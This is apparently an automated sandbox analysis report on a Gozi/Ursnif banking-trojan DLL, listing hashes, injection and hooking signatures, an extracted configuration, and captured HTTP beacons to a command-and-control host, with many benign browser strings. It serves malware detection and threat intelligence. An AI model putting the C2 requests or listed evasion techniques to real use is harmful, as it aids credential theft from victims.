Analysis Report mal.dll

Overview

General Information

Sample Name: mal.dll
Analysis ID: 341461
MD5: 640cf281c09e54fab9c5d0153dffc042
SHA1: 9ae08274286b72b5dab240645af0f513dab2852d
SHA256: a2fa5a4d18033e67a7c0477e69acd03a61808c31e24dd9c120106fec161012ef
Tags: brtdllgoziisfbursnif

Most interesting Screenshot:

Detection

Gozi Ursnif
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Detected Gozi e-Banking trojan
Found malware configuration
Multi AV Scanner detection for submitted file
Sigma detected: Dot net compiler compiles file from suspicious location
Yara detected Ursnif
Allocates memory in foreign processes
Changes memory attributes in foreign processes to executable or writable
Compiles code for process injection (via .Net compiler)
Creates a thread in another existing process (thread injection)
Hooks registry keys query functions (used to hide registry keys)
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the export address table of user mode modules (user mode EAT hooks)
Modifies the import address table of user mode modules (user mode IAT hooks)
Modifies the prolog of user mode functions (user mode inline hooks)
Sigma detected: MSHTA Spawning Windows Shell
Sigma detected: Suspicious Csc.exe Source File Folder
Suspicious powershell command line found
Writes or reads registry keys via WMI
Writes registry values via WMI
Writes to foreign memory regions
Compiles C# or VB.Net code
Contains capabilities to detect virtual machines
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to launch a process as a different user
Contains functionality to query CPU information (cpuid)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file does not import any functions
Queries the volume information (name, serial number etc) of a device
Registers a DLL
Sample file is different than original file name gathered from version info
Searches for the Microsoft Outlook file path
Tries to load missing DLLs
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

AV Detection:

barindex
Found malware configuration
Source: regsvr32.exe.6660.1.memstr Malware Configuration Extractor: Ursnif {"server": "12", "whoami": "user@216041hh6:", "dns": "216041", "version": "251173", "uptime": "219", "crc": "2", "id": "4355", "user": "253fc4ee08f8d2d8cdc8873a4f316e0b", "soft": "3"}
Multi AV Scanner detection for submitted file
Source: mal.dll Virustotal: Detection: 8% Perma Link

Compliance:

barindex
Uses 32bit PE files
Source: mal.dll Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
Uses new MSVCR Dlls
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll Jump to behavior
Uses secure TLS version for HTTPS connections
Source: unknown HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.3:49736 version: TLS 1.2
Source: unknown HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.3:49739 version: TLS 1.2
Source: unknown HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.3:49735 version: TLS 1.2
Source: unknown HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.3:49740 version: TLS 1.2
Source: unknown HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.3:49737 version: TLS 1.2
Source: unknown HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.3:49738 version: TLS 1.2
Source: unknown HTTPS traffic detected: 87.248.118.23:443 -> 192.168.2.3:49733 version: TLS 1.2
Source: unknown HTTPS traffic detected: 87.248.118.23:443 -> 192.168.2.3:49732 version: TLS 1.2
Source: unknown HTTPS traffic detected: 87.248.118.23:443 -> 192.168.2.3:49734 version: TLS 1.2
Source: unknown HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.3:49740 version: TLS 1.2
Contains modern PE file flags such as dynamic base (ASLR) or NX
Source: mal.dll Static PE information: DYNAMIC_BASE, NX_COMPAT
Binary contains paths to debug symbols
Source: Binary string: 7C:\Users\user\AppData\Local\Temp\xjciegge\xjciegge.pdbXP source: powershell.exe, 0000001F.00000002.588416083.000002BCB044F000.00000004.00000001.sdmp
Source: Binary string: partial method>An expression tree may not contain an unsafe pointer operationAAn expression tree may not contain an anonymous method expressionHAn anonymous method expression cannot be converted to an expression tree@Range variable '%1!ls!' cannot be assigned to -- it is read onlyPThe range variable '%1!ls!' cannot have the same name as a method type parameterKThe contextual keyword 'var' cannot be used in a range variable declarationaThe best overloaded Add method '%1!ls!' for the collection initializer has some invalid argumentsAAn expression tree lambda may not contain an out or ref parameterJAn expression tree lambda may not contain a method with variable argumentsSSpecify debug information file name (default: output file name with .pdb extension)$Specify a Win32 manifest file (.xml))Do not include the default Win32 manifestNSpecify an application configuration file containing assembly binding settings8Output line and column of the end location of each errorFBuild a Windows Runtime intermediate file that is consumed by WinMDExp Build an Appcontainer executable+Specify the preferred output language name.3Could not write to output file '%2!ls!' -- '%1!ls!' source: csc.exe, 00000022.00000002.524161454.000001F970260000.00000002.00000001.sdmp, csc.exe, 00000024.00000002.534868528.0000022F9CC10000.00000002.00000001.sdmp
Source: Binary string: 7C:\Users\user\AppData\Local\Temp\xjciegge\xjciegge.pdb source: powershell.exe, 0000001F.00000002.588110987.000002BCB0417000.00000004.00000001.sdmp
Source: Binary string: 7C:\Users\user\AppData\Local\Temp\kboh4jur\kboh4jur.pdbXP source: powershell.exe, 0000001F.00000002.588110987.000002BCB0417000.00000004.00000001.sdmp
Source: Binary string: ntdll.pdb source: regsvr32.exe, 00000001.00000003.532411050.0000000005AF0000.00000004.00000001.sdmp
Source: Binary string: ntdll.pdbUGP source: regsvr32.exe, 00000001.00000003.532411050.0000000005AF0000.00000004.00000001.sdmp
Source: Binary string: rundll32.pdb source: control.exe, 00000026.00000002.562617431.0000018E5BDEC000.00000004.00000040.sdmp
Source: Binary string: rundll32.pdbGCTL source: control.exe, 00000026.00000002.562617431.0000018E5BDEC000.00000004.00000040.sdmp
Source: Binary string: 7C:\Users\user\AppData\Local\Temp\kboh4jur\kboh4jur.pdb source: powershell.exe, 0000001F.00000002.587767653.000002BCB03D7000.00000004.00000001.sdmp
Source: Binary string: c:\Movenear\AgoSection\placeRace\Liquid.pdb source: mal.dll
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_04A1056C RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,CloseHandle,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree, 1_2_04A1056C
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_049FBF1E FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary, 1_2_049FBF1E
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_04A0AF0E lstrlenW,wcscpy,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose, 1_2_04A0AF0E
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_04A09363 lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError, 1_2_04A09363
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_04A05ECD wcscpy,wcscpy,GetLogicalDriveStringsW,GetLogicalDriveStringsW,RtlAllocateHeap,memset,GetLogicalDriveStringsW,WaitForSingleObject,GetDriveTypeW,lstrlenW,wcscpy,lstrlenW,HeapFree, 1_2_04A05ECD

Networking:

barindex
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 87.248.118.23 87.248.118.23
Source: Joe Sandbox View IP Address: 151.101.1.44 151.101.1.44
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 9e10692f1b7f78228b2d4e424db3a98c
Source: global traffic HTTP traffic detected: GET /manifest/QNYwAwEGA6Nk/oqkcQpDHt62/AROwNcnS85Yj6H/Kiw419AbdChBoBC1YflBI/btAWmao42bhmIwaw/rj9hokXq7cOPoMP/C6Fociq1a8i5R_2FP7/qMKfDX8g_/2FYBsdaqsojE5zyNbglU/W9s5aDB_2BHGEIqE0sh/uWRUQeNVDF60PzY5NXM2Np/58y3_2Bk8eYWnbwr0ru/GleU.cnx HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: lopppooole.xyzConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /favicon.ico HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: lopppooole.xyzConnection: Keep-AliveCookie: PHPSESSID=rs7eiful1fouqitmbglbv8teg2; lang=en
Source: global traffic HTTP traffic detected: GET /manifest/DGnwMOevMC4C/FwTBVjFVT7Q/om1iea6xc3SLTm/LhexSznuxAV0l1eIdd7aN/EYbCXiwsAXb_2FQL/BI0B_2BEHYbzkri/CVbt6Ud3hbu6juyQ39/_2FdPSw_2/FAhy67XuasfNyAs2fp_2/FWN1bdwTDPIYYGwfcgE/MI3f3RUzobEk8E33KaQBi_/2BX59YotVm2s8/5lk6oUdX/LH2keW.cnx HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: lopppooole.xyzConnection: Keep-AliveCookie: lang=en; PHPSESSID=rs7eiful1fouqitmbglbv8teg2
Source: global traffic HTTP traffic detected: GET /manifest/kCTdQ_2BVGuRh3/WFBmy05TUuAn4xtP9_2FP/3n_2FnxuIWQ3b206/ecbDlimfQBclFip/FJAwdVz_2B9TFd3nBh/UoR5h5TF0/yDm4Cf1AP8eKKLirBNO7/RmInQmK7NiugHEy8vMH/YJS_2FmFR3z8cT16Qz_2FU/950pqlOH2MscB/Oa5ScIjD/o2f5QwKQBtWpjzyRW_2B5nY/gM3maYjp.cnx HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: lopppooole.xyzConnection: Keep-AliveCookie: lang=en; PHPSESSID=rs7eiful1fouqitmbglbv8teg2
Source: de-ch[1].htm.4.dr String found in binary or memory: <a href="https://www.facebook.com/" target="_blank" data-piitxt="facebooklite" piiurl="https://www.facebook.com/"> equals www.facebook.com (Facebook)
Source: msapplication.xml0.3.dr String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x48741d7a,0x01d6ee9f</date><accdate>0x48741d7a,0x01d6ee9f</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
Source: msapplication.xml0.3.dr String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x48741d7a,0x01d6ee9f</date><accdate>0x48741d7a,0x01d6ee9f</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Facebook.url"/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
Source: msapplication.xml5.3.dr String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x48767fe3,0x01d6ee9f</date><accdate>0x48767fe3,0x01d6ee9f</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
Source: msapplication.xml5.3.dr String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x48767fe3,0x01d6ee9f</date><accdate>0x48767fe3,0x01d6ee9f</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Twitter.url"/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
Source: msapplication.xml7.3.dr String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x4878e2c6,0x01d6ee9f</date><accdate>0x4878e2c6,0x01d6ee9f</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
Source: msapplication.xml7.3.dr String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x4878e2c6,0x01d6ee9f</date><accdate>0x4878e2c6,0x01d6ee9f</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Youtube.url"/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
Source: de-ch[1].htm.4.dr String found in binary or memory: <link rel="preconnect" href="img-s-msn-com.akamaized.net" /><link rel="preconnect" href="c.msn.com" /><link rel="preconnect" href="c.msn.cn" /><link rel="preconnect" href="https://www.bing.com" /><link rel="preconnect" href="//web.vortex.data.msn.com" /><link rel="dns-prefetch" href="img-s-msn-com.akamaized.net" /><link rel="dns-prefetch" href="c.msn.com" /><link rel="dns-prefetch" href="c.msn.cn" /><link rel="dns-prefetch" href="https://www.bing.com" /><link rel="dns-prefetch" href="//web.vortex.data.msn.com" /><link rel="canonical" href="https://www.msn.com/de-ch/" /><meta name="msapplication-TileColor" content="#224f7b"/><meta name="msapplication-TileImage" content="//static-global-s-msn-com.akamaized.net/hp-neu/sc/1f/08ced4.png"/><meta name="msapplication-config" content="none"/> <title>MSN Schweiz | Sign in Hotmail, Outlook Login, Windows Live, Office 365</title> equals www.hotmail.com (Hotmail)
Source: 85-0f8009-68ddb2ab[1].js.4.dr String found in binary or memory: glich.",errorFooterText:"Zu Twitter wechseln",taskLinks:"Benachrichtigungen|https://twitter.com/i/notifications;Ich|#;Abmelden|#"}],xbox:[{header:"Spotlight",content:"",footerText:"Alle anzeigen",footerUrl:"",taskLinks:"me_groove_taskLinks_store|https://www.microsoft.com/store/media/redirect/music?view=hub;me_groove_taskLinks_play|https://aka.ms/Ixhi8e;me_groove_taskLinks_try|https://aka.ms/msvmj1"},{header:"Meine tolle Wiedergabeliste",headerUrl:"https://aka.ms/qeqf5y",content:"",errorMessage:"",taskLinks:"me_groove_taskLinks_store|https://www.microsoft.com/store/media/redirect/music?view=hub;me_groove_taskLinks_play|https://aka.ms/Ixhi8e;me_groove_taskLinks_try|https://aka.ms/msvmj1"}],bingrewards:[{header:"Pr equals www.twitter.com (Twitter)
Source: de-ch[1].htm.4.dr String found in binary or memory: hren, die sich auf Ihren Internetdatenverkehr auswirken.<br/><br/><a href=\""+e.html(f)+'" onclick="window.location.reload(true)">Klicken Sie hier<\/a> um diese Seite erneut zu laden, oder besuchen Sie: <a href="'+i+'">'+i+"<\/a><\/p><\/div><div id='errorref'><span>Ref 1: "+e.html(o(t.clientSettings.aid))+"&nbsp;&nbsp;&nbsp;Ref 2: "+e.html(t.clientSettings.sid||"000000")+"&nbsp;&nbsp;&nbsp;Ref 3: "+e.html((new r.Date).toUTCString())+"<\/span><\/div><\/div>"});ot({errId:1512,errMsg:n})}function ot(n){require(["track"],function(t){var i={errId:n.errId,errMsg:n.errMsg,reportingType:0};t.trackAppErrorEvent(i)})}function tt(){var n=v(arguments);a(l(n,b),n,!0)}function st(){var n=v(arguments);a(l(n,h),n)}function ht(){var n=v(arguments);a(l(n,y),n)}function ct(n){(r.console||{}).timeStamp?console.timeStamp(n):(r.performance||{}).mark&&r.performance.mark(n)}var w=0,it=-1,b=0,h=1,y=2,s=[],p,k,rt,o,d=!1,c=Math.random()*100<=-1;return ut(r,function(n,t,i,r){return w++,n=nt(n,t,i,r," [ENDMESSAGE]"),n&&tt("[SCRIPTERROR] "+n),!0}),c&&require(["jquery","c.deferred"],function(n){k=!0;rt=n;s.length&&g()}),{error:tt,fatalError:et,unhandledErrorCount:function(){return w},perfMark:ct,warning:st,information:ht}});require(["viewAwareInit"],function(n){n({size2row:"(min-height: 48.75em)",size1row:"(max-height: 48.74em)",size4column:"(min-width: 72em)",size3column:"(min-width: 52.313em) and (max-width: 71.99em)",size2column:"(min-width: 43.75em) and (max-width: 52.303em)",size2rowsize4column:"(min-width: 72em) and (min-height: 48.75em)",size2rowsize3column:"(min-width: 52.313em) and (max-width: 71.99em) and (min-height: 48.75em)",size2rowsize2column:"(max-width: 52.303em) and (min-height: 48.75em)",size1rowsize4column:"(min-width: 72em) and (max-height: 48.74em)",size1rowsize3column:"(min-width: 52.313em) and (max-width: 71.99em) and (max-height: 48.74em)",size1rowsize2column:"(max-width: 52.303em) and (max-height: 48.74em)"})});require(["deviceInit"],function(n){n({AllowTransform3d:"false",AllowTransform2d:"true",RtlScrollLeftAdjustment:"none",ShowMoveTouchGestures:"true",SupportFixedPosition:"true",UseCustomMatchMedia:null,Viewport_Behavior:"Default",Viewport_Landscape:null,Viewport:"width=device-width,initial-scale=1.0",IsMobileDevice:"false"})})</script><meta property="sharing_url" content="https://www.msn.com/de-ch"/><meta property="og:url" content="https://www.msn.com/de-ch/"/><meta property="og:title" content="MSN Schweiz | Sign in Hotmail, Outlook Login, Windows Live, Office 365"/><meta property="twitter:card" content="summary_large_image"/><meta property="og:type" content="website"/><meta property="og:site_name" content="MSN"/><meta property="og:image" content="https://static-global-s-msn-com.akamaized.net/hp-neu/sc/c6/519670.jpg"/><link rel="shortcut icon" href="//static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico" /><style>@media screen and (max-width:78.99em) and (min-width:58.875em){.layout-none:not(.mod1) .pos2{left:0}}.ie8 .grid .pick4~li.pick
Source: 85-0f8009-68ddb2ab[1].js.4.dr String found in binary or memory: pfen Sie Ihr Skype-Konto und Ihr Microsoft-Konto.",continueButtonText:"Weiter",learnMoreText:"Hilfe",learnMoreUrl:"https://support.skype.com",callMessageText:"Anruf",fileMessageText:"Datei gesendet",videoMessageText:"Videonachricht",contactMessageText:"Kontakt gesendet"}],jsskype:[{},{}],facebookLite:[{},{likeUrl:"https://www.facebook.com/msnch"}],twitter:[{header:"Twitter",content:"Rufen Sie Ihre Twitter-Updates ab",footerText:"Anmelden",footerUrl:"https://twitter.com",requestTimeout:"10000",taskLinks:""},{header:"Tweets",headerUrl:"https://twitter.com",content:"Laden ...",noContent:"Ihre Timeline ist derzeit leer",errorMessage:"Anmelden bei Twitter nicht m equals www.facebook.com (Facebook)
Source: 85-0f8009-68ddb2ab[1].js.4.dr String found in binary or memory: pfen Sie Ihr Skype-Konto und Ihr Microsoft-Konto.",continueButtonText:"Weiter",learnMoreText:"Hilfe",learnMoreUrl:"https://support.skype.com",callMessageText:"Anruf",fileMessageText:"Datei gesendet",videoMessageText:"Videonachricht",contactMessageText:"Kontakt gesendet"}],jsskype:[{},{}],facebookLite:[{},{likeUrl:"https://www.facebook.com/msnch"}],twitter:[{header:"Twitter",content:"Rufen Sie Ihre Twitter-Updates ab",footerText:"Anmelden",footerUrl:"https://twitter.com",requestTimeout:"10000",taskLinks:""},{header:"Tweets",headerUrl:"https://twitter.com",content:"Laden ...",noContent:"Ihre Timeline ist derzeit leer",errorMessage:"Anmelden bei Twitter nicht m equals www.twitter.com (Twitter)
Source: 85-0f8009-68ddb2ab[1].js.4.dr String found in binary or memory: ter erneut.",viewInboxErrorMessage:"Wenn beim Anzeigen Ihres Posteingangs weiterhin ein Problem auftritt, besuchen Sie",taskLinks:"Verfassen|https://outlook.live.com/mail/deeplink/compose;Kalender|https://outlook.live.com/calendar",piiText:"Read Outlook Email",piiUrl:"http://www.hotmail.msn.com/pii/ReadOutlookEmail/"}],office:[{header:"Office",content:"Zeigen Sie Ihre zuletzt verwendeten Dokumente an oder erstellen Sie kostenlos mit Office Online ein neues.",footerText:"Anmelden",footerUrl:"[[signin]]",ssoAutoRefresh:!0,taskLinks:"Word Online|https://office.live.com/start/Word.aspx?WT.mc_id=MSN_site;Excel Online|https://office.live.com/start/Excel.aspx?WT.mc_id=MSN_site;Sway|https://www.sway.com/?WT.mc_id=MSN_site&utm_source=MSN&utm_medium=Topnav&utm_campaign=link;PowerPoint Online|https://office.live.com/start/PowerPoint.aspx?WT.mc_id=MSN_site"},{header:"Aktuelle Dokumente",headerUrl:"https://onedrive.live.com/#qt=mru",content:"Wird geladen ...",noContent:"Dieser Ordner ist leer. Klicken Sie unten, um ein neues Dokument zu erstellen.",errorMessage:"Keine Verbindung mit Office Online m equals www.hotmail.com (Hotmail)
Source: unknown DNS traffic detected: queries for: www.msn.com
Source: regsvr32.exe, powershell.exe, 0000001F.00000003.541420236.000002BCC5BE0000.00000004.00000001.sdmp, control.exe, 00000026.00000003.539775758.0000018E59D40000.00000004.00000001.sdmp String found in binary or memory: http://constitution.org/usdeclar.txt
Source: regsvr32.exe, 00000001.00000003.530782557.0000000002C90000.00000004.00000001.sdmp, powershell.exe, 0000001F.00000003.541420236.000002BCC5BE0000.00000004.00000001.sdmp, control.exe, 00000026.00000003.539775758.0000018E59D40000.00000004.00000001.sdmp String found in binary or memory: http://constitution.org/usdeclar.txtC:
Source: powershell.exe, 0000001F.00000003.541958735.000002BCC5665000.00000004.00000001.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: powershell.exe, 0000001F.00000003.542147302.000002BCC56CD000.00000004.00000001.sdmp String found in binary or memory: http://crl.m
Source: regsvr32.exe, 00000001.00000003.530782557.0000000002C90000.00000004.00000001.sdmp, regsvr32.exe, 00000001.00000002.561356796.00000000049F0000.00000040.00000001.sdmp, powershell.exe, 0000001F.00000003.541420236.000002BCC5BE0000.00000004.00000001.sdmp, control.exe, 00000026.00000003.539775758.0000018E59D40000.00000004.00000001.sdmp String found in binary or memory: http://https://file://USER.ID%lu.exe/upd
Source: imagestore.dat.26.dr String found in binary or memory: http://lopppooole.xyz/favicon.ico
Source: imagestore.dat.26.dr, imagestore.dat.3.dr String found in binary or memory: http://lopppooole.xyz/favicon.ico~
Source: {BA4D6CF6-5A92-11EB-90E4-ECF4BB862DED}.dat.3.dr String found in binary or memory: http://lopppooole.xyz/manifest/DGnwMOevMC4C/FwTBVjFVT7Q/om1iea6xc3SLTm/LhexSznuxAV0l1eIdd7aN/EYbCXiw
Source: ~DFAFFED478F38F39DF.TMP.3.dr, {BA4D6CF4-5A92-11EB-90E4-ECF4BB862DED}.dat.3.dr String found in binary or memory: http://lopppooole.xyz/manifest/QNYwAwEGA6Nk/oqkcQpDHt62/AROwNcnS85Yj6H/Kiw419AbdChBoBC1YflBI/btAWmao
Source: ~DFFEA6D319A9C13887.TMP.3.dr, {BA4D6CF8-5A92-11EB-90E4-ECF4BB862DED}.dat.3.dr String found in binary or memory: http://lopppooole.xyz/manifest/kCTdQ_2BVGuRh3/WFBmy05TUuAn4xtP9_2FP/3n_2FnxuIWQ3b206/ecbDlimfQBclFip
Source: powershell.exe, 0000001F.00000002.595886985.000002BCBD331000.00000004.00000001.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: de-ch[1].htm.4.dr String found in binary or memory: http://ogp.me/ns#
Source: de-ch[1].htm.4.dr String found in binary or memory: http://ogp.me/ns/fb#
Source: powershell.exe, 0000001F.00000002.563269063.000002BCAD4E0000.00000004.00000001.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: auction[1].htm.4.dr String found in binary or memory: http://popup.taboola.com/german
Source: powershell.exe, 0000001F.00000002.562212430.000002BCAD2D1000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: ~DF24569624759CC30D.TMP.3.dr String found in binary or memory: http://searchads.msn.net/.cfm?&&kp=1&
Source: msapplication.xml.3.dr String found in binary or memory: http://www.amazon.com/
Source: powershell.exe, 0000001F.00000002.563269063.000002BCAD4E0000.00000004.00000001.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: msapplication.xml1.3.dr String found in binary or memory: http://www.google.com/
Source: 85-0f8009-68ddb2ab[1].js.4.dr String found in binary or memory: http://www.hotmail.msn.com/pii/ReadOutlookEmail/
Source: msapplication.xml2.3.dr String found in binary or memory: http://www.live.com/
Source: msapplication.xml3.3.dr String found in binary or memory: http://www.nytimes.com/
Source: msapplication.xml4.3.dr String found in binary or memory: http://www.reddit.com/
Source: msapplication.xml5.3.dr String found in binary or memory: http://www.twitter.com/
Source: msapplication.xml6.3.dr String found in binary or memory: http://www.wikipedia.com/
Source: msapplication.xml7.3.dr String found in binary or memory: http://www.youtube.com/
Source: de-ch[1].htm.4.dr String found in binary or memory: https://amzn.to/2TTxhNg
Source: auction[1].htm.4.dr String found in binary or memory: https://api.taboola.com/2.0/json/msn-ch-de-home/recommendations.notify-click?app.type=desktop&amp;ap
Source: iab2Data[1].json.4.dr String found in binary or memory: https://bealion.com/politica-de-cookies
Source: auction[1].htm.4.dr String found in binary or memory: https://beap.gemini.yahoo.com/action?bv=1.0.0&amp;es=fh6wC_gGIS.10f2hn6DNm4WjTpq0zHdzzquo1zLbbfODSiK
Source: auction[1].htm.4.dr String found in binary or memory: https://beap.gemini.yahoo.com/mbclk?bv=1.0.0&amp;es=fSyMbMQGIS.FowJX5RT8A4RXR8O8RqsK3BZB74OFVi4xfMs.
Source: 55a804ab-e5c6-4b97-9319-86263d365d28[1].json.4.dr String found in binary or memory: https://cdn.cookielaw.org/vendorlist/googleData.json
Source: 55a804ab-e5c6-4b97-9319-86263d365d28[1].json.4.dr String found in binary or memory: https://cdn.cookielaw.org/vendorlist/iab2Data.json
Source: 55a804ab-e5c6-4b97-9319-86263d365d28[1].json.4.dr String found in binary or memory: https://cdn.cookielaw.org/vendorlist/iabData.json
Source: auction[1].htm.4.dr String found in binary or memory: https://cdn.flurry.com/adTemplates/templates/htmls/clips.html&quot;
Source: iab2Data[1].json.4.dr String found in binary or memory: https://channelpilot.co.uk/privacy-policy
Source: de-ch[1].htm.4.dr String found in binary or memory: https://click.linksynergy.com/deeplink?id=xoqYgl4JDe8&amp;mid=46130&amp;u1=dech_mestripe_office&amp;
Source: de-ch[1].htm.4.dr String found in binary or memory: https://click.linksynergy.com/deeplink?id=xoqYgl4JDe8&amp;mid=46130&amp;u1=dech_mestripe_store&amp;m
Source: 85-0f8009-68ddb2ab[1].js.4.dr String found in binary or memory: https://client-s.gateway.messenger.live.com
Source: de-ch[1].htm.4.dr String found in binary or memory: https://clk.tradedoubler.com/click?p=245744&amp;a=3064090&amp;g=21863656
Source: de-ch[1].htm.4.dr String found in binary or memory: https://clkde.tradedoubler.com/click?p=245744&amp;a=3064090&amp;g=24903118&amp;epi=ch-de
Source: ~DF24569624759CC30D.TMP.3.dr String found in binary or memory: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2
Source: de-ch[1].htm.4.dr String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172
Source: de-ch[1].htm.4.dr String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&amp;crid=722878611&amp;size=306x271&amp;http
Source: de-ch[1].htm.4.dr String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&amp;crid=858412214&amp;size=306x271&amp;http
Source: ~DF24569624759CC30D.TMP.3.dr String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1
Source: ~DF24569624759CC30D.TMP.3.dr String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1
Source: powershell.exe, 0000001F.00000002.595886985.000002BCBD331000.00000004.00000001.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000001F.00000002.595886985.000002BCBD331000.00000004.00000001.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000001F.00000002.595886985.000002BCBD331000.00000004.00000001.sdmp String found in binary or memory: https://contoso.com/License
Source: iab2Data[1].json.4.dr String found in binary or memory: https://docs.prebid.org/privacy.html
Source: 55a804ab-e5c6-4b97-9319-86263d365d28[1].json.4.dr String found in binary or memory: https://geolocation.onetrust.com/cookieconsentpub/v1/geo/location
Source: powershell.exe, 0000001F.00000002.563269063.000002BCAD4E0000.00000004.00000001.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: auction[1].htm.4.dr String found in binary or memory: https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ce_sharpen%2Ch_311%2Cw_207%2Cc_fill%
Source: auction[1].htm.4.dr String found in binary or memory: https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:au
Source: auction[1].htm.4.dr String found in binary or memory: https://ir2.beap.gemini.yahoo.com/mbcsc?bv=1.0.0&amp;es=lwPv9W0GIS_qyQvCpzJTy3EGufaBHjdqJd8SOiFJsdj7
Source: de-ch[1].htm.4.dr String found in binary or memory: https://itunes.apple.com/ch/app/microsoft-news/id945416273?pt=80423&amp;ct=prime_footer&amp;mt=8
Source: de-ch[1].htm.4.dr String found in binary or memory: https://linkmaker.itunes.apple.com/assets/shared/badges/de-de/appstore-lrg.svg&quot;
